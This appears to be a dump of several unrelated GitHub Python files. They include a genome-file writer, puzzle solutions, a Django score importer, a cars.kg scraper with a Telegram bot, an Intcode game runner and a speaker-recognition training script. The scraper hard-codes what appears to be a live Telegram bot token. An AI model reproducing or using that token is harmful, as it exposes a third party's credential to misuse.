'w')\n\t\n\tnewfile.write(\">%s\\n\" %name)\n\n\tletter = -1\n\tfor i in range(each_line_100):\n\t\tfor j in range(100):\n\t\t\tletter += 1\n\t\t\tnewfile.write(RNA[letter])\n\t\tnewfile.write(\"\\n\")\n\t\n\tif len(RNA)%100 != 0:\n\t\tfor m in range(len(RNA)%100):\n\t\t\tletter += 1\n\t\t\tnewfile.write(RNA[letter])\n\t\n\tnewfile.close()\n\nif __name__ == '__main__':\n\twrite_txt()\n","repo_name":"Polaroidd/PRIMER_2022_1","sub_path":"write_gene_txt.py","file_name":"write_gene_txt.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21458890617","text":"lines = []\nbounds = (0, 0)\n\nwith open('input.txt') as f:\n for line in f:\n a, b = line.rstrip().split(' -> ')\n x1, y1 = [int(n) for n in a.split(',')]\n x2, y2 = [int(n) for n in b.split(',')]\n\n if not (x1 == x2 or y1 == y2):\n # diagonal\n continue\n\n lines.append(((min(x1, x2), min(y1, y2), max(x1, x2), max(y1, y2))))\n bounds = (\n max(bounds[0], x1, x2),\n max(bounds[1], y1, y2)\n )\n\nprint(f'Bounds: {bounds}')\nprint(f'Lines: {len(lines)}')\n\ncounts = [[0] * (bounds[0] + 1) for i in range(bounds[1] + 1)]\n\nfor x1, y1, x2, y2 in lines:\n if x1 == x2:\n for i in range(y1, y2 + 1):\n counts[i][x1] += 1\n\n elif y1 == y2:\n for i in range(x1, x2 + 1):\n counts[y1][i] += 1\n\ncount = 0\nfor l in counts:\n for v in l:\n if v > 1:\n count += 1\n\nprint(count)","repo_name":"tiagoad/aoc21","sub_path":"5/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"16290265484","text":"import openpyxl\nimport datetime\nimport base64\nimport json\nfrom django.conf import settings\n\nfrom Cryptodome.Cipher import AES\nfrom . encryptdecrypt import encrypt , decrypt\nfrom . ScoreSheetClass import ScoreSheetClass\nfrom . basicunit import basicunit \nimport ast\n\ndef returnreporttypes():\n \n\n return Reports\n\n\ndef validatelist(Scoreslist):\n err =1\n msg = \"\"\n for score in Scoreslist:\n if score.myScore == -1 :\n err = -1\n msg = \"Could Not Process Upload,\"+ score.myStudentId +\" Has Entries with No Score\"\n return(err,msg)\n return(err,msg)\n\ndef generatescorelist(excel_file):\n wb = openpyxl.Workbook() \n wb = openpyxl.load_workbook(excel_file)\n ws = wb[\"SCORESSHEET\"]\n ws.protection.sheet = True\n row_start=7\n try :\n print(\"insisde generatescorelist\")\n SECRETKEYciphertext =ws.cell(1, 1).value\n print(SECRETKEYciphertext)\n #newvalue = SECRETKEYciphertext#.decode(\"utf-8\");\n #print(\"ECRETKEYciphertext\")\n #print(SECRETKEYciphertext)\n #python_dict = json.loads(SECRETKEYciphertext);\n #print(python_dict)\n #print(\"afterECRETKEYciphertext\")\n #print(type(SECRETKEYciphertext))\n #Convert String To Dictionary\n dict_string=SECRETKEYciphertext\n converted_dict = ast.literal_eval(dict_string)\n #print('Data type of variable converted_dict is ', type(converted_dict))\n #Access value from dictionary\n #print(converted_dict[\"salt\"])\n #cipher = AES.new(settings.CIPHER_PASS.rjust(32, 'X'),AES.MODE_ECB) # never use ECB in strong systems obviously\n #decodedSecretkey = decrypt(base64.b64decode(SECRETKEYciphertext)).decode(\"utf-8\") \n #decodedSecretkey = decrypt(SECRETKEYciphertext,settings.CIPHER_PASS) \n decodedSecretkey = decrypt(converted_dict,settings.CIPHER_PASS)\n print(decodedSecretkey)\n print(\"Finished decrypting\")\n newvalue = decodedSecretkey.decode(\"utf-8\");\n #print(newvalue)\n #print(type(newvalue))\n #print(\"Finished decrypting and removed b\")\n #python_dict = json.loads(newvalue);\n #print(type(python_dict))\n #print(python_dict)\n #print(\"Finished decrypting and removed b print(type(python_dict))\")\n #xindex=decodedSecretkey.find('{\"CCODE\":') \n #print(\"The index is\")\n #print(xindex)\n #print(\"The index is after\")\n #decodedSecretkey= decodedSecretkey[xindex :]\n #Secretkeyobj=json.loads(decodedSecretkey)\n Secretkeyobj=json.loads(newvalue)\n \n except Exception as inst:\n print(\"I am raise error\")\n print(inst) \n return {},{}\n \n \n\n\n\n myCampId=Secretkeyobj['CID']\n print(myCampId)\n myFacId=\"XXX\"\n myDeptId=\"XXX\"\n myProgId=\"XXX\"\n myProgOptionId=\"XXX\"\n myAsetId = Secretkeyobj['AsetId']\n myAsessionId = Secretkeyobj['AsessionId']\n mySemesterId = Secretkeyobj['SemesterId']\n myLevelTodo = Secretkeyobj['LevelToDo']\n myCourseId = Secretkeyobj['CourseId']\n myCourseUnit = Secretkeyobj['CourseUnit']\n\n print(myCourseId)\n print(\"myCourseId\")\n basicunits = basicunit( myCampId,myFacId,myDeptId,myProgId,myProgOptionId,myAsetId,myAsessionId,mySemesterId,myLevelTodo,myCourseId)\n \n total =int(Secretkeyobj['TOTAL'])\n scorelist = [] \n for i in range(row_start,total+ row_start):\n CourseId =ws.cell(i, 8).value\n myScoreSheetClassId = ws.cell(i, 9).value\n \n StudentId = ws.cell(i, 2).value\n AsessionId =Secretkeyobj['AsessionId']\n SemesterId =Secretkeyobj['SemesterId']\n \n AsetId =Secretkeyobj['AsetId']\n LevelToDo=Secretkeyobj['LevelToDo']\n CourseState=ws.cell(i, 10).value\n CourseUnit = Secretkeyobj['CourseUnit']\n CourseNature= ws.cell(i, 11).value\n Score=ws.cell(i, 6).value \n AUserId =1\n donedate= str(datetime.datetime.today())\n ReadOnly=ws.cell(i, 13).value\n \n # d1 = ScoreSheetClass(DetailResultId , StudentId , AsessionId, SemesterId, CourseId, AsetId, LevelToDo, CourseState, CourseUnit, \n # CourseNature, Score, AUserId, donedate, ReadOnly ) \n # scorelist.append(d1) \n\n d1 = ScoreSheetClass ( myScoreSheetClassId, \"\", \"\", \"\", StudentId, AsessionId, SemesterId, CourseId, AsetId, LevelToDo, CourseUnit, CourseNature, CourseState, Score, \n AUserId, donedate, ReadOnly, ws.cell(i, 12).value, Secretkeyobj['CID'] ) \n scorelist.append(d1) \n \n return scorelist,basicunits","repo_name":"Oladeji/LecturerToWebResultDjangoInteface","sub_path":"GradeManagerapp/generatescorelist.py","file_name":"generatescorelist.py","file_ext":"py","file_size_in_byte":5719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9432608134","text":"from json import JSONEncoder, JSONDecoder\nfrom libs.logger.logger import log\n\nclass Response():\n def __init__(self, request):\n log('libs/http/Response', request)\n self.request = request\n self.status = '200'\n self.headers = []\n self.json = {\n 'status': 'ok',\n 'message': '',\n 'data': {},\n }\n\n def setJSON(self, json = {}):\n log('libs/http/Response/setJSON', json)\n self.status = '200'\n self.json = {\n 'status': 'ok',\n 'message': '',\n 'data': json,\n }\n return self\n\n def setError(self, status = '400', message = ''):\n log('libs/http/Response/setError', {status, message})\n self.status = status\n self.json = {\n 'status': 'error',\n 'message': message,\n 'data': {},\n }\n return self\n \n def getStatusMessage(self, status):\n log('libs/http/Response/getStatusMessage', status)\n if status == '200':\n return 'OK'\n\n if status == '404':\n return 'NOT FOUND'\n\n return 'ERROR'\n \n def getFirstLine(self, status):\n log('libs/http/Response/getFirstLine', status)\n message = self.getStatusMessage(status)\n return ' '.join(['HTTP/1.1', status, message])\n\n def getBodyString(self):\n log('libs/http/Response/getBodyString', self.json)\n return str(self.json)\n\n def __str__(self):\n res = []\n\n res.append(self.getFirstLine(self.status))\n res.append(': '.join(['Content-Type', 'application/json']))\n res.append('')\n res.append(self.getBodyString())\n\n res.append('')\n\n return str('\\r\\n'.join(res))\n","repo_name":"brtmvdl/hidden","sub_path":"src/api/libs/http/Response.py","file_name":"Response.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"34060090753","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 25 20:02:16 2019\n\n@author: Will\n\"\"\"\n\nprint(\"Please think of a number between 0 and 100\")\nlow=0\nhigh=100\nwhile True:\n ans=int((low+high)/2)\n print(\"Is your secret number\",ans,\"?\")\n print(\"Enter 'h' to indicate the guess is too high.\")\n print(\"Enter 'l' to indicate the guess is too low.\")\n print(\"Enter 'c' to indicate I guessed correctly.\")\n guess=input()\n if guess==\"c\":\n break\n elif guess==\"h\":\n high=ans\n elif guess==\"l\":\n low=ans\n else:\n print(\"Wrong Input\")\nprint(\"Game Over\")\nprint(\"Your secret number was:\",ans)","repo_name":"cuichacha/MIT-6.00.1x","sub_path":"Week 2: Simple Programs/3. Simple Algorithms/Bisection Search.py","file_name":"Bisection Search.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42537811250","text":"from bs4 import BeautifulSoup as bs\nimport requests\nimport csv\n\ncount = 0\n\ndef get_html(url: str) -> str:\n '''Получает html код определенного сайта'''\n response = requests.get(url)\n return response.text\n\ndef get_data(html:str) -> list:\n '''Функция парсер, получает все данные с сайта'''\n soup = bs(html, 'lxml')\n catalog = soup.find('div', class_ = 'catalog-list')\n cars = catalog.find_all('a', class_ = 'catalog-list-item')\n result = []\n for car in cars:\n \n name = car.find('span', class_ = 'catalog-item-caption').text.strip()\n try:\n img = car.find('img', class_ = 'catalog-item-cover-img').get('src')\n except:\n img = 'No picture'\n price = car.find('span', class_ = 'catalog-item-price').text\n year = car.find('span', class_ = 'caption-year').text.strip()\n mile = car.find('span', class_ = 'catalog-item-mileage').text.strip()\n desc = car.find('span', class_ = 'catalog-item-descr').text.strip()\n \n\n data = {\n 'name': name,\n 'price': price,\n 'year': year,\n 'mile':mile,\n 'desc': desc,\n 'img': img\n }\n\n result.append(data)\n\n return result\n\ndef write_to_csv(data:dict) -> None:\n '''Функция для записи всех данных в CSV файл'''\n\n with open('carsss.csv', 'a') as file:\n fieldnames = ['#', 'Name', 'Price', 'Year', 'Mile', 'Desc', 'Image']\n writer = csv.DictWriter(file, fieldnames)\n global count\n\n for car in data:\n count += 1\n writer.writerow ({\n '#': count,\n 'Name': car['name'],\n 'Price': car['price'],\n 'Year':car['year'],\n 'Mile': car['mile'],\n 'Desc': car['desc'],\n 'Image':car['img']\n })\n\ndef prepare_csv() -> None:\n '''Функция которая подготовит csv файл'''\n with open ('carsss.csv', 'w') as file:\n fieldnames = ['#', 'Name', 'Price', 'Year', 'Mile', 'Desc', 'Image']\n writer = csv.DictWriter(file, fieldnames)\n writer.writerow({\n '#': '#',\n 'Name': 'Name',\n 'Price': 'Price',\n 'Year': 'Year',\n 'Mile': 'Mile',\n 'Desc': 'Desc',\n 'Image':'Image'\n })\n\ndef main():\n i = 1\n prepare_csv()\n while True:\n url = f'https://cars.kg/offers/{i}'\n html = get_html(url)\n data = get_data(html)\n write_to_csv(data)\n print(f'Спарсили {i} страницу!')\n if i == 15:\n break\n i += 1\n \n\nmain()\n\n\nimport telebot\nfrom telebot import types\n\ntoken = '5979985933:AAEaf4hhdcX0XL9jo4wgSOeLV4bDkBi8qGc'\n\nbot = telebot.TeleBot(token)\n\n@bot.message_handler(commands=['start'])\ndef start_message(message):\n with open ('carsss.csv', 'r') as file:\n bot.send_document(message.chat.id, file)\n\nbot.polling()\n\n\n","repo_name":"manas-d/py26_lections","sub_path":"parsing/parsing_cars/cars_kg.py","file_name":"cars_kg.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13895751108","text":"\"\"\"A simple routine to load in a FASTQ file and give us the distribution of qname lengths, because I was curious\"\"\"\nimport numpy as np\nimport pysam\n\nfrom mitty.benchmarking.alignmentscore import load_qname_sidecar\n\n\ndef main(fastq_fname, qname_overflow_fname, max_expected_qname_length=500):\n long_qname_table = load_qname_sidecar(qname_overflow_fname)\n qname_count = [0] * (max_expected_qname_length + 1)\n with pysam.FastxFile(fastq_fname) as fh:\n for r in fh:\n qlen = len(long_qname_table.get(r.name.split('|', 1)[0])) if r.name[-1] != '*' else len(r.name)\n qname_count[min(qlen, max_expected_qname_length)] += 1\n\n return qname_count","repo_name":"sbg/Mitty","sub_path":"mitty/empirical/qnamestats.py","file_name":"qnamestats.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"77"} +{"seq_id":"39920653826","text":"# cube of a number\n# get the imput number from user\nn=int(input())\n# define the cube function\ndef cube():\n# cube formula is storen in c\n c=n*n*n\n# return the c value\n return c\n# call the cube function and store it in number\nnumber=cube()\n# print the number as output\nprint(number)\n","repo_name":"dharani277/guvi","sub_path":"codekata/absolute_beginner/cube.py","file_name":"cube.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16258418572","text":"import sys\nimport math\nimport itertools\nfrom dataclasses import dataclass\nfrom datetime import datetime\n\ndatetime_start = datetime.now()\n\nDEBUG_LEVEL = 0\n\n@dataclass\nclass Program:\n code: list\n ip: int\n base: int\n memory: dict\n\n def reset(self):\n self.ip = 0\n self.base = 0\n self.memory = {}\n for i in range(len(self.code)):\n self.memory[i] = self.code[i]\n\n def read(self, addr):\n if addr < 0:\n raise Exception(f\"error - attempted to read from {addr}\")\n return self.memory.get(addr, 0)\n\n def write(self, op, param_num, value):\n addr = self.read(self.ip+param_num)\n if op[3-param_num] == \"2\":\n addr = self.base + addr\n if addr < 0:\n raise Exception(f\"error - attempted to write to {addr}\")\n self.memory[addr] = value\n\n def isRunning(self):\n return (not self.isHalted())\n\n def isHalted(self):\n return self.read(self.ip) == 99\n\n def getParam(self,op,param_num):\n p_val = self.read(self.ip+param_num)\n if op[3-param_num] == \"1\": #immediate mode\n return p_val\n elif op[3-param_num] == \"2\": #relative mode\n return self.read(self.base + p_val)\n else:\n return self.read(p_val)\n\n def nextOp(self, input_source, inp=0):\n op = str(self.memory[self.ip]).zfill(5)\n if DEBUG_LEVEL>1: print(f\"\\tOP: {op}\")\n outp = None\n op_i = int(op[3:])\n if op_i == 1: # ADD\n value = self.getParam(op,1) + self.getParam(op,2)\n self.write(op, 3, value)\n self.ip+=4\n elif op_i == 2: # MUL\n value = self.getParam(op,1) * self.getParam(op,2)\n self.write(op, 3, value)\n self.ip+=4\n elif op_i == 3: # INP\n nextInput = input_source.getNext(inp)\n inp+=1\n if nextInput == None:\n raise Exception(\"Error: no input provided for input operation\")\n self.write(op, 1, nextInput)\n self.ip+=2\n elif op_i == 4: # OUTP\n outp = self.getParam(op,1)\n self.ip+=2\n elif op_i == 5:\n if self.getParam(op,1) != 0:\n self.ip = self.getParam(op,2)\n else:\n self.ip+=3\n elif op_i == 6:\n if self.getParam(op,1) == 0:\n self.ip = self.getParam(op,2)\n else:\n self.ip+=3\n elif op_i == 7:\n value = int(self.getParam(op,1) < self.getParam(op,2))\n self.write(op, 3, value)\n self.ip+=4\n elif op_i == 8:\n value = int(self.getParam(op,1) == self.getParam(op,2))\n self.write(op, 3, value)\n self.ip+=4\n elif op_i == 9:\n self.base+=self.getParam(op,1)\n self.ip+=2\n else:\n raise Exception(f\"unknown operation {op} at ip {self.ip}\\n\\t{self}\")\n return outp, inp\n\ndef elapsedTimeMs(since=datetime_start):\n return datetime.now()-since\n\ndef processLines(lines):\n code = list(map(int,lines[0].split(\",\")))\n memory = {}\n for addr in range(len(code)):\n memory[addr] = code[addr]\n return Program(code,0,0,memory)\n\ndef readFile(filename = sys.argv[1]):\n filename = sys.argv[1]\n lines = []\n with open(filename) as f:\n lines = f.read().splitlines()\n return processLines(lines)\n\n# 0 is an empty tile. No game object appears in this tile.\n# 1 is a wall tile. Walls are indestructible barriers.\n# 2 is a block tile. Blocks can be broken by the ball.\n# 3 is a horizontal paddle tile. The paddle is indestructible.\n# 4 is a ball tile. The ball moves diagonally and bounces off objects.\n\nEMPTY=0\nWALL=1 \nBLOCK=2 #breakable\nPADDLE=3 #horizontal\nBALL=4 # moves diagonally, bounces\n\n@dataclass(unsafe_hash=True)\nclass Point:\n x: int\n y: int\n\n@dataclass\nclass InputSource:\n joystick: int\n def getNext(self, inp):\n return self.joystick\n\nprogram = readFile()\nif DEBUG_LEVEL>1: print(f\"\\t{program.memory}\")\n\ndef runProgram(program,input_source,msg=\"\"):\n print(f\"running with inputs {input_source}\\n{msg}\")\n inp=0\n buffer=[]\n tiles={}\n score=0\n paddle=None\n ball=None\n while program.isRunning():\n if ball and paddle:\n if ball.x == paddle.x:\n input_source.joystick=NEUTRAL\n elif ball.x1: print(f\"\\t{program.memory}\")\n return tiles,score\n\nLEFT=-1\nNEUTRAL=0\nRIGHT=1\n\ntiles,score = runProgram(program, InputSource(NEUTRAL))\nnum_blocks = sum(1 for tile in tiles if tiles[tile]==BLOCK)\nprint(f\"{elapsedTimeMs()} looks like there are {num_blocks} blocks\")\n\nprogram = readFile()\nprogram.code[0] = 2\nprogram.reset()\ntiles,score = runProgram(program, InputSource(NEUTRAL))\nprint(f\"{elapsedTimeMs()} got a score of {score}\")\n","repo_name":"benjm/aoc2019","sub_path":"day13/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":5792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20209291513","text":"#!/usr/bin/python\n#-*- coding: utf-8 -*-\n\nimport sys, time, os, argparse, socket\nimport numpy\nimport pdb\nimport torch\nimport glob\nfrom tuneThreshold import tuneThresholdfromScore\nfrom SpeakerNet import SpeakerNet\nfrom DatasetLoader import DatasetLoader\nimport subprocess\nimport time\nfrom pathlib import Path\nfrom data_fetch import download_gcs_dataset, extract_gcs_dataset, \\\n transcode_gcs_dataset, set_loc_paths_from_gcs_dataset,\\\n download_blob, upload_blob\nimport yaml\nimport os\nimport pwd\nimport google\n\n# for local runs, use this for unique checkpoint dirs across team members\ndef get_username():\n return pwd.getpwuid( os.getuid() )[ 0 ]\n\n\nparser = argparse.ArgumentParser(description = \"SpeakerNet\");\n\n## New args to support running on kubernetes/kubeflow\n# @note \"tmp\" denotes that this output data will not be captured by\n# the kubeflow pipeline or made available to downstream components\n# set --data-bucket in order to fetch lists and data from GCS before reading\n# them from local filesystem\n\n# temporary/internal outputs\nparser.add_argument('--data-bucket', type=str)\nparser.add_argument('--save-tmp-data-to', type=str, default=\"./tmp/data/\")\nparser.add_argument('--skip-data-fetch', action='store_true')\nparser.add_argument('--force-training-reset', action='store_true')\nparser.add_argument('--save-tmp-model-to', type=str, default=\"./tmp/model/\");\nparser.add_argument('--save-tmp-results-to', type=str, default=\"./tmp/results/\");\nparser.add_argument('--save-tmp-feats-to', type=str, default=\"./tmp/feats/\");\n\nparser.add_argument('--checkpoint-bucket', type=str,\n default=\"voxsrc-2020-checkpoints-dev\");\nparser.add_argument('--checkpoint-path', type=str, default=f\"{get_username()}/\");\n\n# permanent/component outputs\nparser.add_argument('--save-model-to', type=str, default=\"./out/model.txt\")\n\n## Data loader\nparser.add_argument('--max_frames', type=int, default=200, help='Input length to the network');\nparser.add_argument('--batch_size', type=int, default=200, help='Batch size');\n# ^^^ use --batch_size=30 for small datasets that can't fill an entire 200 speaker pair/triplet batch\nparser.add_argument('--max_seg_per_spk', type=int, default=100, help='Maximum number of utterances per speaker per epoch');\nparser.add_argument('--nDataLoaderThread', type=int, default=5, help='Number of loader threads');\n\n## Training details\nparser.add_argument('--test_interval', type=int, default=10, help='Test and save every [test_interval] epochs');\nparser.add_argument('--max_epoch', type=int, default=100, help='Maximum number of epochs');\n# ^^^ use --max_epoch=1 for local testing\nparser.add_argument('--trainfunc', type=str, default=\"amsoftmax\", help='Loss function');\nparser.add_argument('--optimizer', type=str, default=\"adam\", help='sgd or adam');\n\n## Learning rates\nparser.add_argument('--lr', type=float, default=0.001, help='Learning rate');\nparser.add_argument(\"--lr_decay\", type=float, default=0.95, help='Learning rate decay every [test_interval] epochs');\n\n## Loss functions\nparser.add_argument(\"--hard_prob\", type=float, default=0.5, help='Hard negative mining probability, otherwise random, only for some loss functions');\nparser.add_argument(\"--hard_rank\", type=int, default=10, help='Hard negative mining rank in the batch, only for some loss functions');\nparser.add_argument('--margin', type=float, default=0.3, help='Loss margin, only for some loss functions');\nparser.add_argument('--scale', type=float, default=30, help='Loss scale, only for some loss functions');\nparser.add_argument('--nSpeakers', type=int, default=5994, help='Number of speakers in the softmax layer for softmax-based losses, utterances per speaker per iteration for other losses');\n\n## Load and save\nparser.add_argument('--initial_model', type=str, default=\"\", help='Initial model weights');\nparser.add_argument('--save_path', type=str, default=\"/tmp/data/exp1\", help='Path for model and logs');\n\n## Training and test data\nparser.add_argument('--train_list', type=str, help='Train list');\nparser.add_argument('--test_list', type=str, help='Evaluation list');\nparser.add_argument('--train_path', type=str, default=\"voxceleb2\", help='Absolute path to the train set');\nparser.add_argument('--test_path', type=str, default=\"voxceleb1\", help='Absolute path to the test set');\n\n## For test only\nparser.add_argument('--eval', dest='eval', action='store_true', help='Eval only')\n\n## Model definition\nparser.add_argument('--model', type=str, default=\"ResNetSE34L\", help='Name of model definition');\nparser.add_argument('--encoder_type', type=str, default=\"SAP\", help='Type of encoder');\nparser.add_argument('--nOut', type=int, default=512, help='Embedding size in the last FC layer');\n\nargs = parser.parse_args();\n\ntrain_list, test_list, train_path, test_path = [None, None, None, None]\n\n## Fetch data from GCS if enabled\nif args.data_bucket is not None and not args.skip_data_fetch:\n print(\"Performing GCS data fetch\")\n # download, extract, transcode (compressed AAC->WAV) dataset\n download_gcs_dataset(args)\n extract_gcs_dataset(args)\n transcode_gcs_dataset(args)\n # set new lists and data paths\n train_list, test_list, train_path, test_path \\\n = set_loc_paths_from_gcs_dataset(args)\nelif args.data_bucket is not None and args.skip_data_fetch:\n print(\"Skipping GCS data fetch\")\n # dataset from GCS already available; set new lists and data paths\n train_list, test_list, train_path, test_path \\\n = set_loc_paths_from_gcs_dataset(args)\nelse:\n print(\"Using local, permanent dataset\")\n # pass through to use permanent local dataset\n train_list = args.train_list\n test_list = args.test_list\n train_path = args.train_path\n test_path = args.test_path\n\n# init directories\n# temporary / internal output directories\ntmp_output_dirs = [args.save_tmp_model_to, args.save_tmp_results_to,\n args.save_tmp_feats_to]\n# directories of parmanent / component output artifacts\noutput_dirs = [os.path.dirname(args.save_model_to)]\n\nfor d in (tmp_output_dirs + output_dirs):\n if not(os.path.exists(d)):\n os.makedirs(d)\n\n# set device cuda or cpu\ncuda_avail = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if cuda_avail else \"cpu\")\nprint(f\"Cuda available: {cuda_avail}\")\n\n## Load models\ns = SpeakerNet(device, **vars(args));\n\nit = 1;\nprevloss = float(\"inf\");\nsumloss = 0;\n\n# Load model weights\n\n# Check for training meta data from a previously preempted run\nMETADATA_NAME = 'metadata.yaml'\nmetadata_gcs_src_path = os.path.join(args.checkpoint_path, METADATA_NAME)\nmetadata_file_dst_path = os.path.join(args.save_tmp_model_to, METADATA_NAME)\ndefault_metadata = {'is_done': False}\nmetadata = default_metadata\n\nif args.force_training_reset:\n print(\"Starting at epoch 0, regardless of previous training progress\")\nelse:\n # fetch metadata if available\n try:\n download_blob(args.checkpoint_bucket, metadata_gcs_src_path,\n metadata_file_dst_path)\n print(\"Downloaded previous training metadata\")\n with open(metadata_file_dst_path, 'r') as f:\n try:\n metadata = yaml.safe_load(f)\n print(f\"Loaded previous training metadata: {metadata}\")\n # grab the latest model name (corresponding to the last epoch)\n latest_model_name = metadata['latest_model_name']\n # download the model\n model_gcs_src_path = os.path.join(args.checkpoint_path, latest_model_name)\n model_file_dst_path = os.path.join(args.save_tmp_model_to, latest_model_name)\n try:\n download_blob(args.checkpoint_bucket, model_gcs_src_path,\n model_file_dst_path)\n print(\"**Downloaded a saved model**\")\n # load the saved model's params into the model class\n s.loadParameters(model_file_dst_path);\n print(\"Model %s loaded from previous state!\"%model_file_dst_path);\n it = int(os.path.splitext(os.path.basename(model_file_dst_path))[0][5:]) + 1\n except google.cloud.exceptions.NotFound:\n print(\"**No saved model found**\")\n except yaml.YAMLError as exc:\n print(exc)\n metadata = default_metadata\n except google.cloud.exceptions.NotFound:\n print(\"**No previous training metadata found**\")\n\n # exit if previous training run finished\n if 'is_done' in metadata and metadata['is_done']:\n print(\"Terminating... training for this run has already completed\")\n quit()\n\nif(args.initial_model != \"\"):\n raise \"Error: TODO\"\n s.loadParameters(args.initial_model);\n print(\"Model %s loaded!\"%args.initial_model);\n\nfor ii in range(0,it-1):\n if ii % args.test_interval == 0:\n clr = s.updateLearningRate(args.lr_decay) \n\n## Evaluation code\nif args.eval == True:\n raise \"Error: TODO\"\n sc, lab = s.evaluateFromListSave(test_list, print_interval=100, feat_dir=args.save_tmp_feats_to, test_path=test_path)\n result = tuneThresholdfromScore(sc, lab, [1, 0.1]);\n print('EER %2.4f'%result[1])\n\n quit();\n\n## Write args to scorefile\nscorefile = open(os.path.join(args.save_tmp_results_to,\"scores.txt\"), \"a+\");\n\nfor items in vars(args):\n print(items, vars(args)[items]);\n scorefile.write('%s %s\\n'%(items, vars(args)[items]));\nscorefile.flush()\n\n## Assertion\ngsize_dict = {'proto':args.nSpeakers, 'triplet':2, 'contrastive':2, 'softmax':1, 'amsoftmax':1, 'aamsoftmax':1, 'ge2e':args.nSpeakers, 'angleproto':args.nSpeakers}\n\nassert args.trainfunc in gsize_dict\nassert gsize_dict[args.trainfunc] <= 100\n\n## Initialise data loader\ntrainLoader = DatasetLoader(train_list,\n gSize=gsize_dict[args.trainfunc], new_train_path=train_path,\n **vars(args));\n\nclr = s.updateLearningRate(1)\n\n# touch the output file/dir\nprint(f\"Creating parent dir for path={args.save_tmp_model_to}\")\nPath(args.save_tmp_model_to).parent.mkdir(parents=True, exist_ok=True)\n\nwhile(1):\n print(time.strftime(\"%Y-%m-%d %H:%M:%S\"), it, \"Training %s with LR %f...\"%(args.model,max(clr)));\n\n ## Train network\n loss, traineer = s.train_network(loader=trainLoader);\n\n\n ## Validate and save\n if it % args.test_interval == 0:\n raise \"Error: TODO\"\n\n print(time.strftime(\"%Y-%m-%d %H:%M:%S\"), it, \"Evaluating...\");\n\n sc, lab = s.evaluateFromListSave(test_list, print_interval=100,\n feat_dir=args.save_tmp_feats_to, test_path=test_path)\n result = tuneThresholdfromScore(sc, lab, [1, 0.1]);\n\n print(time.strftime(\"%Y-%m-%d %H:%M:%S\"), \"LR %f, TEER/T1 %2.2f, TLOSS %f, VEER %2.4f\"%( max(clr), traineer, loss, result[1]));\n scorefile.write(\"IT %d, LR %f, TEER/T1 %2.2f, TLOSS %f, VEER %2.4f\\n\"%(it, max(clr), traineer, loss, result[1]));\n\n scorefile.flush()\n\n clr = s.updateLearningRate(args.lr_decay) \n\n\n ## touch the output file/dir\n #Path(args.save_tmp_model_to).parent.mkdir(parents=True, exist_ok=True)\n #with open(args.save_tmp_model_to, 'w') as eerfile:\n # eerfile.write(f\"model iter: {it}\")\n # eerfile.write('%.4f'%result[1])\n\n eerfile = open(args.save_tmp_model_to+\"/model%09d.eer\"%it, 'w')\n eerfile.write('%.4f'%result[1])\n eerfile.close()\n ret = '%.4f'%result[1]\n\n else:\n\n print(time.strftime(\"%Y-%m-%d %H:%M:%S\"), \"LR %f, TEER %2.2f, TLOSS %f\"%( max(clr), traineer, loss));\n scorestuff = \"IT %d, LR %f, TEER %2.2f, TLOSS %f\\n\"%(it, max(clr), traineer, loss)\n scorefile.write(scorestuff);\n # write contents\n with open(args.save_model_to, 'w') as model_save_file:\n model_save_file.write(f\"[model] ret={scorestuff}\\n\")\n\n scorefile.flush()\n\n # save model file for this epoch\n model_name = \"model%09d.model\"%it\n model_filename = os.path.join(args.save_tmp_model_to, model_name)\n s.saveParameters(model_filename);\n # update metadata\n metadata['latest_model_name'] = model_name\n metadata['num_epochs'] = it\n # dump metadata to yaml file\n with open(metadata_file_dst_path, 'w') as f:\n try:\n yaml.dump(metadata, f)\n print(\"Saved current training metadata\")\n except yaml.YAMLError as exc:\n print(exc)\n # upload model to GCS\n model_gcs_dst_path = os.path.join(args.checkpoint_path, model_name)\n model_file_src_path = os.path.join(args.save_tmp_model_to, model_name)\n upload_blob(args.checkpoint_bucket, model_gcs_dst_path,\n model_file_src_path)\n # upload metadata to GCS\n metadata_gcs_dst_path = metadata_gcs_src_path\n metadata_file_src_path = metadata_file_dst_path\n upload_blob(args.checkpoint_bucket, metadata_gcs_dst_path,\n metadata_file_src_path)\n\n if it >= args.max_epoch:\n break\n\n it+=1;\n print(\"\");\n\nscorefile.close();\n\n\n# save \"done\" to metadata so it restarts on retry\nmetadata['is_done'] = True\n\n# dump metadata to yaml file\nwith open(metadata_file_dst_path, 'w') as f:\n try:\n yaml.dump(metadata, f)\n print(\"Saved current training metadata\")\n except yaml.YAMLError as exc:\n print(exc)\n\n# upload metadata to GCS\nmetadata_gcs_dst_path = metadata_gcs_src_path\nmetadata_file_src_path = metadata_file_dst_path\nupload_blob(args.checkpoint_bucket, metadata_gcs_dst_path,\n metadata_file_src_path)\n","repo_name":"mmwebster/voxceleb_trainer","sub_path":"trainSpeakerNet.py","file_name":"trainSpeakerNet.py","file_ext":"py","file_size_in_byte":13504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"18942054032","text":"# system\nimport os\nimport time\nimport argparse\n\n# scipy\nimport numpy as np\n\n# matplotlib\nimport matplotlib.pyplot as plt\n\n# grandlib\nimport grand.io.root_trees as 